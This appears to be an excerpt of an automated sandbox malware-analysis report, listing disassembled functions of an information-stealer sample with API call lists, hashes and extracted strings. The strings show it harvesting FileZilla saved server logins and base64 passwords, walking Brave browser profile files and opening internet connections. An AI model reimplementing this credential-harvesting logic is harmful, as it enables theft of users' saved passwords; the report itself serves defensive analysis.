                                • API String ID: 2635522530-726946144
                                • Opcode ID: 79cc91ca10b05d5f103e1ee128e4a4f5288ff6945ba87cc1df0e0f6f21705cae
                                • Instruction ID: c0d40fc9bb2fe7fa0e1507e364b2c21b4eb901f85ae9c9e3f4f7c03ae975b6c3
                                • Opcode Fuzzy Hash: 79cc91ca10b05d5f103e1ee128e4a4f5288ff6945ba87cc1df0e0f6f21705cae
                                • Instruction Fuzzy Hash: E192AC71A112169BCB60FF69DC89AAE77BABF46300F04452DF84AA7351DB34DC458F90
                                Function 006B18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B18D2
                                • lstrlen.KERNEL32(\*.*), ref: 006B18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006B190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B1947
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B1967
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B1981
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B19BF
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1A4C
                                • lstrlen.KERNEL32(006D1794), ref: 006B1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1A80
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1AB4
                                • lstrlen.KERNEL32(?), ref: 006B1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 006B1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1B19
                                • lstrlen.KERNEL32(013393B8), ref: 006B1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1B8F
                                • lstrlen.KERNEL32(006D1794), ref: 006B1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1BC3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1C57
                                • lstrlen.KERNEL32(006D1794), ref: 006B1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1C8B
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1D21
                                • lstrlen.KERNEL32(006D1794), ref: 006B1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1D55
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1DED
                                • lstrlen.KERNEL32(006D1794), ref: 006B1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1E36
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1E68
                                • lstrlen.KERNEL32(0133D690), ref: 006B1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1EB2
                                • lstrlen.KERNEL32(006D1794), ref: 006B1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1EE3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1F15
                                • lstrlen.KERNEL32(0133DC20), ref: 006B1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1F5F
                                • lstrlen.KERNEL32(006D1794), ref: 006B1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1F90
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1FC2
                                • lstrlen.KERNEL32(0132A468), ref: 006B1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2036
                                • lstrlen.KERNEL32(006D1794), ref: 006B2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2067
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2098
                                • lstrlen.KERNEL32(?), ref: 006B20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 006B20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2103
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B213F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006B214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 773ea1d5cc3f681e4ad2926a09706c0702cc8c8058e8f67e6308146b4f3c8db6
                                • Instruction ID: 598b207b1ef388892d0ec4ad67f52dc4cb5e0ef7a009a0b52a226ccc262d2d5c
                                • Opcode Fuzzy Hash: 773ea1d5cc3f681e4ad2926a09706c0702cc8c8058e8f67e6308146b4f3c8db6
                                • Instruction Fuzzy Hash: AB624EB1A12617ABCB21BB69DC68AEFB7BBBF42700F440129F90597251DB34DD41CB90
                                Function 006B3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006B392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006B3943
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B396C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B3986
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B39F2
                                • lstrlen.KERNEL32(006D1794), ref: 006B39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3A1A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3A26
                                • lstrlen.KERNEL32(?), ref: 006B3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 006B3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3A8A
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B3ACE
                                • lstrlen.KERNEL32(?), ref: 006B3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B36
                                • lstrlen.KERNEL32(006D1794), ref: 006B3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B6A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3B9E
                                • lstrlen.KERNEL32(?), ref: 006B3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 006B3BE0
                                • lstrlen.KERNEL32(01339358), ref: 006B3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3C3C
                                • lstrlen.KERNEL32(013393B8), ref: 006B3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3CB7
                                • lstrlen.KERNEL32(006D1794), ref: 006B3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3CE8
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3D79
                                • lstrlen.KERNEL32(006D1794), ref: 006B3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3DAD
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3E43
                                • lstrlen.KERNEL32(006D1794), ref: 006B3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3E77
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3F0D
                                • lstrlen.KERNEL32(006D1794), ref: 006B3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3F41
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3F75
                                • lstrlen.KERNEL32(?), ref: 006B3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 006B3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B3FE0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B401F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006B402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B40CE
                                • lstrcat.KERNEL32(00000000), ref: 006B40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006B42D9
                                • FindClose.KERNEL32(00000000), ref: 006B42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: 480e1b57a3451b790a12b56c97aeacf9c05e43c06bd65c61346ab8cdc9312478
                                • Instruction ID: 7e975c90b3953e0279f5e3f27ad6ccd66784be4b8f325efc2a923888ed3fe85c
                                • Opcode Fuzzy Hash: 480e1b57a3451b790a12b56c97aeacf9c05e43c06bd65c61346ab8cdc9312478
                                • Instruction Fuzzy Hash: 616292B1A11626ABCB21BF69DC58AEEB7BBBF41700F044229F845A7351DB34DD41CB90
                                Function 006B6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006B69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 006B6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 006B6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006B6B35
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6B9D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: d30c42ce03131335a97ef648cf7466133692aca65cfab2835107b2e58c9d06ca
                                • Instruction ID: 67c2665b46e9b02b0399b55527ee51b53b3ee8a117e242332019e4dfde834aa0
                                • Opcode Fuzzy Hash: d30c42ce03131335a97ef648cf7466133692aca65cfab2835107b2e58c9d06ca
                                • Instruction Fuzzy Hash: B542BFB0A01216ABCB11BBB9DC59AEEBBBBBF45700F044519F905E7251DB38DD41CBA0
                                Function 006ADB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADBEF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006ADBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC17
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006ADC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC4C
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADC8F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006ADCD0
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006ADCF0
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006ADD0A
                                • lstrlen.KERNEL32(006CCFEC), ref: 006ADD1D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADD7B
                                • lstrlen.KERNEL32(006D1794), ref: 006ADD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDA3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADDAF
                                • lstrlen.KERNEL32(?), ref: 006ADDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006ADDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADE19
                                • lstrlen.KERNEL32(006D1794), ref: 006ADE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADE6F
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADE7B
                                • lstrlen.KERNEL32(01339218), ref: 006ADE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADEBB
                                • lstrlen.KERNEL32(006D1794), ref: 006ADEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADEE6
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADEF2
                                • lstrlen.KERNEL32(01339398), ref: 006ADF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFA5
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADFB1
                                • lstrlen.KERNEL32(01339218), ref: 006ADFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADFF4
                                • lstrlen.KERNEL32(006D1794), ref: 006ADFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE022
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006AE02E
                                • lstrlen.KERNEL32(01339398), ref: 006AE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006AE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006AE0E7
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE11F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006AE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006AE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE19F
                                • lstrcat.KERNEL32(00000000), ref: 006AE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006AE1F9
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE22F
                                • lstrlen.KERNEL32(01339358), ref: 006AE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE261
                                • lstrcat.KERNEL32(00000000,01339358), ref: 006AE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006AE988
                                • FindClose.KERNEL32(00000000), ref: 006AE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: 00017950428cb19917884e7b006b3abf18d8486f3a00aa35297155125ef40fe3
                                • Instruction ID: 6bde3a7321f04b56905fea4a767700671aef0c2239ced42ea327338e3d80cdd6
                                • Opcode Fuzzy Hash: 00017950428cb19917884e7b006b3abf18d8486f3a00aa35297155125ef40fe3
                                • Instruction Fuzzy Hash: 68527B70A112169BCB21FF69DC99AAEB7BABF46700F04416DF84A97751EB34DC018F90
                                Function 006A60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A60FF
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6152
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6185
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A61B5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A61F0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006A6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
